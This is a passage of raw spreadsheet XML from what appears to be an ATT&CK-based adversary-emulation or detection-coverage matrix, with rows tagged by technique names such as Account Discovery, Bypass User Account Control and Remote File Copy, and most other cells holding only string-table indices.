        <f>VLOOKUP(D20,Sheet2!A:B,2,0)</f>
        <v>Query Registry</v>
      </c>
      <c r="F20" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G20" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H20" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I20" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J20" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K20" s="9" t="s">
        <v>860</v>
      </c>
      <c r="L20" s="12" t="s">
        <v>781</v>
      </c>
    </row>
    <row r="21" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A21" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B21" s="26" t="s">
        <v>782</v>
      </c>
      <c r="C21" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D21" s="11" t="s">
        <v>573</v>
      </c>
      <c r="E21" s="9" t="s">
        <v>574</v>
      </c>
      <c r="F21" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G21" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H21" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I21" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J21" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K21" s="9" t="s">
        <v>689</v>
      </c>
      <c r="L21" s="12" t="s">
        <v>782</v>
      </c>
    </row>
    <row r="22" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A22" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B22" s="26" t="s">
        <v>783</v>
      </c>
      <c r="C22" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D22" s="7" t="s">
        <v>14</v>
      </c>
      <c r="E22" s="9" t="str">
        <f>VLOOKUP(D22,Sheet2!A:B,2,0)</f>
        <v>Network Share Discovery</v>
      </c>
      <c r="F22" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G22" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H22" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I22" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J22" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K22" s="9" t="s">
        <v>690</v>
      </c>
      <c r="L22" s="12" t="s">
        <v>783</v>
      </c>
    </row>
    <row r="23" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A23" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B23" s="26" t="s">
        <v>784</v>
      </c>
      <c r="C23" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D23" s="7" t="s">
        <v>14</v>
      </c>
      <c r="E23" s="9" t="str">
        <f>VLOOKUP(D23,Sheet2!A:B,2,0)</f>
        <v>Network Share Discovery</v>
      </c>
      <c r="F23" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G23" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H23" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I23" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J23" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K23" s="9" t="s">
        <v>691</v>
      </c>
      <c r="L23" s="12" t="s">
        <v>784</v>
      </c>
    </row>
    <row r="24" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A24" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B24" s="26" t="s">
        <v>785</v>
      </c>
      <c r="C24" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D24" s="7" t="s">
        <v>494</v>
      </c>
      <c r="E24" s="9" t="s">
        <v>495</v>
      </c>
      <c r="F24" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G24" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H24" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I24" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J24" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K24" s="9" t="s">
        <v>692</v>
      </c>
      <c r="L24" s="12" t="s">
        <v>785</v>
      </c>
    </row>
    <row r="25" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A25" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B25" s="26" t="s">
        <v>786</v>
      </c>
      <c r="C25" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D25" s="7" t="s">
        <v>494</v>
      </c>
      <c r="E25" s="9" t="s">
        <v>495</v>
      </c>
      <c r="F25" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G25" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H25" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I25" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J25" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K25" s="9" t="s">
        <v>693</v>
      </c>
      <c r="L25" s="12" t="s">
        <v>786</v>
      </c>
    </row>
    <row r="26" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A26" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B26" s="26" t="s">
        <v>787</v>
      </c>
      <c r="C26" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D26" s="7" t="s">
        <v>6</v>
      </c>
      <c r="E26" s="9" t="str">
        <f>VLOOKUP(D26,Sheet2!A:B,2,0)</f>
        <v>System Network Configuration Discovery</v>
      </c>
      <c r="F26" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G26" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H26" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I26" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J26" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K26" s="9" t="s">
        <v>694</v>
      </c>
      <c r="L26" s="12" t="s">
        <v>787</v>
      </c>
    </row>
    <row r="27" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A27" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B27" s="26" t="s">
        <v>788</v>
      </c>
      <c r="C27" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D27" s="7" t="s">
        <v>8</v>
      </c>
      <c r="E27" s="9" t="str">
        <f>VLOOKUP(D27,Sheet2!A:B,2,0)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="F27" s="10" t="s">
        <v>850</v>
      </c>
      <c r="G27" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H27" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I27" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J27" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K27" s="9" t="s">
        <v>695</v>
      </c>
      <c r="L27" s="12" t="s">
        <v>788</v>
      </c>
    </row>
    <row r="28" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A28" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B28" s="26" t="s">
        <v>789</v>
      </c>
      <c r="C28" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D28" s="7" t="s">
        <v>10</v>
      </c>
      <c r="E28" s="9" t="str">
        <f>VLOOKUP(D28,Sheet2!A:B,2,0)</f>
        <v>Permission Groups Discovery</v>
      </c>
      <c r="F28" s="10" t="s">
        <v>738</v>
      </c>
      <c r="G28" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H28" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I28" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J28" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K28" s="9" t="s">
        <v>696</v>
      </c>
      <c r="L28" s="12" t="s">
        <v>789</v>
      </c>
    </row>
    <row r="29" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A29" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B29" s="26" t="s">
        <v>790</v>
      </c>
      <c r="C29" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D29" s="7" t="s">
        <v>10</v>
      </c>
      <c r="E29" s="9" t="str">
        <f>VLOOKUP(D29,Sheet2!A:B,2,0)</f>
        <v>Permission Groups Discovery</v>
      </c>
      <c r="F29" s="10" t="s">
        <v>681</v>
      </c>
      <c r="G29" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H29" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I29" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J29" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K29" s="9" t="s">
        <v>697</v>
      </c>
      <c r="L29" s="12" t="s">
        <v>790</v>
      </c>
    </row>
    <row r="30" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A30" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B30" s="26" t="s">
        <v>791</v>
      </c>
      <c r="C30" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D30" s="7" t="s">
        <v>11</v>
      </c>
      <c r="E30" s="9" t="str">
        <f>VLOOKUP(D30,Sheet2!A:B,2,0)</f>
        <v>Account Discovery</v>
      </c>
      <c r="F30" s="10" t="s">
        <v>739</v>
      </c>
      <c r="G30" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H30" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I30" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J30" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K30" s="9" t="s">
        <v>698</v>
      </c>
      <c r="L30" s="12" t="s">
        <v>791</v>
      </c>
    </row>
    <row r="31" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A31" s="21" t="s">
        <v>854</v>
      </c>
      <c r="B31" s="26" t="s">
        <v>792</v>
      </c>
      <c r="C31" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D31" s="7" t="s">
        <v>11</v>
      </c>
      <c r="E31" s="9" t="str">
        <f>VLOOKUP(D31,Sheet2!A:B,2,0)</f>
        <v>Account Discovery</v>
      </c>
      <c r="F31" s="10" t="s">
        <v>746</v>
      </c>
      <c r="G31" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H31" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I31" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J31" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K31" s="9" t="s">
        <v>699</v>
      </c>
      <c r="L31" s="12" t="s">
        <v>792</v>
      </c>
    </row>
    <row r="32" spans="1:12" ht="32" x14ac:dyDescent="0.2">
      <c r="A32" s="22" t="s">
        <v>855</v>
      </c>
      <c r="B32" s="15" t="s">
        <v>793</v>
      </c>
      <c r="C32" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D32" s="7" t="s">
        <v>12</v>
      </c>
      <c r="E32" s="9" t="str">
        <f>VLOOKUP(D32,Sheet2!A:B,2,0)</f>
        <v>Remote System Discovery</v>
      </c>
      <c r="F32" s="10" t="s">
        <v>740</v>
      </c>
      <c r="G32" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H32" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I32" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J32" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K32" s="9" t="s">
        <v>700</v>
      </c>
      <c r="L32" s="12" t="s">
        <v>793</v>
      </c>
    </row>
    <row r="33" spans="1:12" ht="32" x14ac:dyDescent="0.2">
      <c r="A33" s="22" t="s">
        <v>855</v>
      </c>
      <c r="B33" s="15" t="s">
        <v>794</v>
      </c>
      <c r="C33" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D33" s="7" t="s">
        <v>8</v>
      </c>
      <c r="E33" s="9" t="str">
        <f>VLOOKUP(D33,Sheet2!A:B,2,0)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="F33" s="10" t="s">
        <v>741</v>
      </c>
      <c r="G33" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H33" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I33" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J33" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K33" s="9" t="s">
        <v>702</v>
      </c>
      <c r="L33" s="12" t="s">
        <v>794</v>
      </c>
    </row>
    <row r="34" spans="1:12" ht="32" x14ac:dyDescent="0.2">
      <c r="A34" s="22" t="s">
        <v>855</v>
      </c>
      <c r="B34" s="23" t="s">
        <v>796</v>
      </c>
      <c r="C34" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D34" s="7" t="s">
        <v>8</v>
      </c>
      <c r="E34" s="9" t="str">
        <f>VLOOKUP(D34,Sheet2!A:B,2,0)</f>
        <v>System Network Connections Discovery</v>
      </c>
      <c r="F34" s="10" t="s">
        <v>856</v>
      </c>
      <c r="G34" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H34" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I34" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J34" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K34" s="9" t="s">
        <v>701</v>
      </c>
      <c r="L34" s="5" t="s">
        <v>796</v>
      </c>
    </row>
    <row r="35" spans="1:12" ht="56" x14ac:dyDescent="0.2">
      <c r="A35" s="22" t="s">
        <v>855</v>
      </c>
      <c r="B35" s="23" t="s">
        <v>797</v>
      </c>
      <c r="C35" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D35" s="11" t="s">
        <v>7</v>
      </c>
      <c r="E35" s="9" t="str">
        <f>VLOOKUP(D35,Sheet2!A:B,2,0)</f>
        <v>Query Registry</v>
      </c>
      <c r="F35" s="10" t="s">
        <v>858</v>
      </c>
      <c r="G35" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H35" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I35" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J35" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K35" s="9" t="s">
        <v>703</v>
      </c>
      <c r="L35" s="5" t="s">
        <v>797</v>
      </c>
    </row>
    <row r="36" spans="1:12" ht="154" x14ac:dyDescent="0.2">
      <c r="A36" s="33" t="s">
        <v>16</v>
      </c>
      <c r="B36" s="34" t="s">
        <v>798</v>
      </c>
      <c r="C36" s="25" t="s">
        <v>16</v>
      </c>
      <c r="D36" s="7" t="s">
        <v>22</v>
      </c>
      <c r="E36" s="9" t="str">
        <f>VLOOKUP(D36,Sheet2!A:B,2,0)</f>
        <v>Bypass User Account Control</v>
      </c>
      <c r="F36" s="6" t="s">
        <v>861</v>
      </c>
      <c r="G36" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H36" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I36" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J36" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K36" s="9" t="s">
        <v>704</v>
      </c>
      <c r="L36" s="5" t="s">
        <v>798</v>
      </c>
    </row>
    <row r="37" spans="1:12" ht="154" x14ac:dyDescent="0.2">
      <c r="A37" s="33" t="s">
        <v>16</v>
      </c>
      <c r="B37" s="34" t="s">
        <v>798</v>
      </c>
      <c r="C37" s="25" t="s">
        <v>863</v>
      </c>
      <c r="D37" s="7" t="s">
        <v>466</v>
      </c>
      <c r="E37" s="9" t="str">
        <f>VLOOKUP(D37,Sheet2!A:B,2,0)</f>
        <v>Remote File Copy</v>
      </c>
      <c r="F37" s="6" t="s">
        <v>861</v>
      </c>
      <c r="G37" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H37" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I37" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J37" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K37" s="9" t="s">
        <v>704</v>
      </c>
      <c r="L37" s="5" t="s">
        <v>798</v>
      </c>
    </row>
    <row r="38" spans="1:12" ht="154" x14ac:dyDescent="0.2">
      <c r="A38" s="33" t="s">
        <v>16</v>
      </c>
      <c r="B38" s="34" t="s">
        <v>798</v>
      </c>
      <c r="C38" s="25" t="s">
        <v>864</v>
      </c>
      <c r="D38" s="7" t="s">
        <v>545</v>
      </c>
      <c r="E38" s="9" t="str">
        <f>VLOOKUP(D38,Sheet2!A:B,2,0)</f>
        <v>Standard Application Layer Protocol</v>
      </c>
      <c r="F38" s="6" t="s">
        <v>861</v>
      </c>
      <c r="G38" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H38" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I38" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J38" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K38" s="9" t="s">
        <v>704</v>
      </c>
      <c r="L38" s="5" t="s">
        <v>798</v>
      </c>
    </row>
    <row r="39" spans="1:12" ht="154" x14ac:dyDescent="0.2">
      <c r="A39" s="33" t="s">
        <v>16</v>
      </c>
      <c r="B39" s="34" t="s">
        <v>798</v>
      </c>
      <c r="C39" s="25" t="s">
        <v>864</v>
      </c>
      <c r="D39" s="7" t="s">
        <v>113</v>
      </c>
      <c r="E39" s="9" t="str">
        <f>VLOOKUP(D39,Sheet2!A:B,2,0)</f>
        <v>Commonly Used Port</v>
      </c>
      <c r="F39" s="6" t="s">
        <v>861</v>
      </c>
      <c r="G39" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H39" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I39" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J39" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K39" s="9" t="s">
        <v>704</v>
      </c>
      <c r="L39" s="5" t="s">
        <v>798</v>
      </c>
    </row>
    <row r="40" spans="1:12" ht="70" x14ac:dyDescent="0.2">
      <c r="A40" s="33" t="s">
        <v>16</v>
      </c>
      <c r="B40" s="34" t="s">
        <v>798</v>
      </c>
      <c r="C40" s="25" t="s">
        <v>862</v>
      </c>
      <c r="D40" s="7" t="s">
        <v>24</v>
      </c>
      <c r="E40" s="9" t="str">
        <f>VLOOKUP(D40,Sheet2!A:B,2,0)</f>
        <v>Access Token Manipulation</v>
      </c>
      <c r="F40" s="6" t="s">
        <v>742</v>
      </c>
      <c r="G40" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H40" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I40" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J40" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K40" s="9" t="s">
        <v>704</v>
      </c>
      <c r="L40" s="5" t="s">
        <v>798</v>
      </c>
    </row>
    <row r="41" spans="1:12" ht="84" x14ac:dyDescent="0.2">
      <c r="A41" s="31" t="s">
        <v>23</v>
      </c>
      <c r="B41" s="32" t="s">
        <v>799</v>
      </c>
      <c r="C41" s="25" t="s">
        <v>3</v>
      </c>
      <c r="D41" s="7" t="s">
        <v>60</v>
      </c>
      <c r="E41" s="9" t="str">
        <f>VLOOKUP(D41,Sheet2!A:B,2,0)</f>
        <v>Application Window Discovery</v>
      </c>
      <c r="F41" s="6" t="s">
        <v>867</v>
      </c>
      <c r="G41" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H41" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I41" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J41" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K41" s="9" t="s">
        <v>705</v>
      </c>
      <c r="L41" s="5" t="s">
        <v>799</v>
      </c>
    </row>
    <row r="42" spans="1:12" ht="84" x14ac:dyDescent="0.2">
      <c r="A42" s="31" t="s">
        <v>23</v>
      </c>
      <c r="B42" s="32" t="s">
        <v>799</v>
      </c>
      <c r="C42" s="25" t="s">
        <v>865</v>
      </c>
      <c r="D42" s="7" t="s">
        <v>27</v>
      </c>
      <c r="E42" s="9" t="str">
        <f>VLOOKUP(D42,Sheet2!A:B,2,0)</f>
        <v>Input Capture</v>
      </c>
      <c r="F42" s="6" t="s">
        <v>867</v>
      </c>
      <c r="G42" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H42" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I42" s="7" t="s">
        <v>762</v>
      </c>
      <c r="J42" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K42" s="9" t="s">
        <v>705</v>
      </c>
      <c r="L42" s="5" t="s">
        <v>799</v>
      </c>
    </row>
    <row r="43" spans="1:12" ht="56" x14ac:dyDescent="0.2">
      <c r="A43" s="31" t="s">
        <v>23</v>
      </c>
      <c r="B43" s="32" t="s">
        <v>801</v>
      </c>
      <c r="C43" s="25" t="s">
        <v>23</v>
      </c>
      <c r="D43" s="7" t="s">
        <v>26</v>
      </c>
      <c r="E43" s="9" t="str">
        <f>VLOOKUP(D43,Sheet2!A:B,2,0)</f>
        <v>Credentials in Files</v>
      </c>
      <c r="F43" s="6" t="s">
        <v>874</v>
      </c>
      <c r="G43" s="7" t="s">
        <v>762</v>
      </c>
      <c r="H43" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I43" s="7" t="s">
        <v>866</v>
      </c>
      <c r="J43" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K43" s="9" t="s">
        <v>706</v>
      </c>
      <c r="L43" s="5" t="s">
        <v>801</v>
      </c>
    </row>
    <row r="44" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A44" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B44" s="30" t="s">
        <v>802</v>
      </c>
      <c r="C44" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D44" s="7" t="s">
        <v>92</v>
      </c>
      <c r="E44" s="9" t="str">
        <f>VLOOKUP(D44,Sheet2!A:B,2,0)</f>
        <v>Brute Force</v>
      </c>
      <c r="F44" s="6" t="s">
        <v>868</v>
      </c>
      <c r="G44" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H44" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I44" s="6" t="s">
        <v>803</v>
      </c>
      <c r="J44" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K44" s="9" t="s">
        <v>707</v>
      </c>
      <c r="L44" s="5" t="s">
        <v>802</v>
      </c>
    </row>
    <row r="45" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A45" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B45" s="30" t="s">
        <v>802</v>
      </c>
      <c r="C45" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D45" s="7" t="s">
        <v>13</v>
      </c>
      <c r="E45" s="9" t="str">
        <f>VLOOKUP(D45,Sheet2!A:B,2,0)</f>
        <v>Windows Admin Shares</v>
      </c>
      <c r="F45" s="6" t="s">
        <v>868</v>
      </c>
      <c r="G45" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H45" s="7" t="s">
        <v>806</v>
      </c>
      <c r="I45" s="6" t="s">
        <v>803</v>
      </c>
      <c r="J45" s="7" t="s">
        <v>806</v>
      </c>
      <c r="K45" s="9" t="s">
        <v>707</v>
      </c>
      <c r="L45" s="5" t="s">
        <v>802</v>
      </c>
    </row>
    <row r="46" spans="1:12" ht="70" x14ac:dyDescent="0.2">
      <c r="A46" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B46" s="30" t="s">
        <v>808</v>
      </c>
      <c r="C46" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D46" s="7" t="s">
        <v>609</v>
      </c>
      <c r="E46" s="9" t="str">
        <f>VLOOKUP(D46,Sheet2!A:B,2,0)</f>
        <v>Valid Accounts</v>
      </c>
      <c r="F46" s="6" t="s">
        <v>873</v>
      </c>
      <c r="G46" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H46" s="12" t="s">
        <v>806</v>
      </c>
      <c r="I46" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J46" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K46" s="9" t="s">
        <v>807</v>
      </c>
      <c r="L46" s="5" t="s">
        <v>808</v>
      </c>
    </row>
    <row r="47" spans="1:12" ht="70" x14ac:dyDescent="0.2">
      <c r="A47" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B47" s="30" t="s">
        <v>808</v>
      </c>
      <c r="C47" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D47" s="7" t="s">
        <v>13</v>
      </c>
      <c r="E47" s="9" t="str">
        <f>VLOOKUP(D47,Sheet2!A:B,2,0)</f>
        <v>Windows Admin Shares</v>
      </c>
      <c r="F47" s="6" t="s">
        <v>872</v>
      </c>
      <c r="G47" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H47" s="12" t="s">
        <v>806</v>
      </c>
      <c r="I47" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J47" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K47" s="9" t="s">
        <v>807</v>
      </c>
      <c r="L47" s="5" t="s">
        <v>808</v>
      </c>
    </row>
    <row r="48" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A48" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B48" s="30" t="s">
        <v>810</v>
      </c>
      <c r="C48" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D48" s="7" t="s">
        <v>382</v>
      </c>
      <c r="E48" s="9" t="str">
        <f>VLOOKUP(D48,Sheet2!A:B,2,0)</f>
        <v>Network Share Connection Removal</v>
      </c>
      <c r="F48" s="6" t="s">
        <v>871</v>
      </c>
      <c r="G48" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H48" s="6" t="s">
        <v>806</v>
      </c>
      <c r="I48" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J48" s="6"/>
      <c r="K48" s="9" t="s">
        <v>708</v>
      </c>
      <c r="L48" s="5" t="s">
        <v>810</v>
      </c>
    </row>
    <row r="49" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A49" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B49" s="30" t="s">
        <v>811</v>
      </c>
      <c r="C49" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D49" s="7" t="s">
        <v>609</v>
      </c>
      <c r="E49" s="9" t="str">
        <f>VLOOKUP(D49,Sheet2!A:B,2,0)</f>
        <v>Valid Accounts</v>
      </c>
      <c r="F49" s="6" t="s">
        <v>870</v>
      </c>
      <c r="G49" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H49" s="6" t="s">
        <v>806</v>
      </c>
      <c r="I49" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J49" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K49" s="9" t="s">
        <v>709</v>
      </c>
      <c r="L49" s="5" t="s">
        <v>811</v>
      </c>
    </row>
    <row r="50" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A50" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B50" s="30" t="s">
        <v>811</v>
      </c>
      <c r="C50" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D50" s="7" t="s">
        <v>13</v>
      </c>
      <c r="E50" s="9" t="str">
        <f>VLOOKUP(D50,Sheet2!A:B,2,0)</f>
        <v>Windows Admin Shares</v>
      </c>
      <c r="F50" s="6" t="s">
        <v>870</v>
      </c>
      <c r="G50" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H50" s="6" t="s">
        <v>806</v>
      </c>
      <c r="I50" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J50" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K50" s="9" t="s">
        <v>709</v>
      </c>
      <c r="L50" s="5" t="s">
        <v>811</v>
      </c>
    </row>
    <row r="51" spans="1:12" ht="28" x14ac:dyDescent="0.2">
      <c r="A51" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B51" s="30" t="s">
        <v>815</v>
      </c>
      <c r="C51" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D51" s="7" t="s">
        <v>466</v>
      </c>
      <c r="E51" s="9" t="str">
        <f>VLOOKUP(D51,Sheet2!A:B,2,0)</f>
        <v>Remote File Copy</v>
      </c>
      <c r="F51" s="10" t="s">
        <v>881</v>
      </c>
      <c r="G51" s="10" t="s">
        <v>762</v>
      </c>
      <c r="H51" s="10" t="s">
        <v>806</v>
      </c>
      <c r="I51" s="10" t="s">
        <v>762</v>
      </c>
      <c r="J51" s="10" t="s">
        <v>806</v>
      </c>
      <c r="K51" s="9" t="s">
        <v>710</v>
      </c>
      <c r="L51" s="5" t="s">
        <v>815</v>
      </c>
    </row>
    <row r="52" spans="1:12" ht="70" x14ac:dyDescent="0.2">
      <c r="A52" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B52" s="30" t="s">
        <v>816</v>
      </c>
      <c r="C52" s="25" t="s">
        <v>823</v>
      </c>
      <c r="D52" s="7" t="s">
        <v>111</v>
      </c>
      <c r="E52" s="9" t="str">
        <f>VLOOKUP(D52,Sheet2!A:B,2,0)</f>
        <v>Command-Line Interface</v>
      </c>
      <c r="F52" s="6" t="s">
        <v>880</v>
      </c>
      <c r="G52" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H52" s="6" t="s">
        <v>806</v>
      </c>
      <c r="I52" s="6" t="s">
        <v>762</v>
      </c>
      <c r="J52" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K52" s="9" t="s">
        <v>817</v>
      </c>
      <c r="L52" s="5" t="s">
        <v>816</v>
      </c>
    </row>
    <row r="53" spans="1:12" ht="42" x14ac:dyDescent="0.2">
      <c r="A53" s="29" t="s">
        <v>869</v>
      </c>
      <c r="B53" s="30" t="s">
        <v>818</v>
      </c>
      <c r="C53" s="25" t="s">
        <v>32</v>
      </c>
      <c r="D53" s="7" t="s">
        <v>466</v>
      </c>
      <c r="E53" s="9" t="str">
        <f>VLOOKUP(D53,Sheet2!A:B,2,0)</f>
        <v>Remote File Copy</v>
      </c>
      <c r="F53" s="6" t="s">
        <v>879</v>
      </c>
      <c r="G53" s="6" t="s">
        <v>762</v>
      </c>
      <c r="H53" s="6" t="s">
        <v>809</v>
      </c>
      <c r="I53" s="6" t="s">
        <v>812</v>
      </c>
      <c r="J53" s="6" t="s">
        <v>809</v>
      </c>
      <c r="K53" s="9" t="s">
        <v>711</v>
      </c>
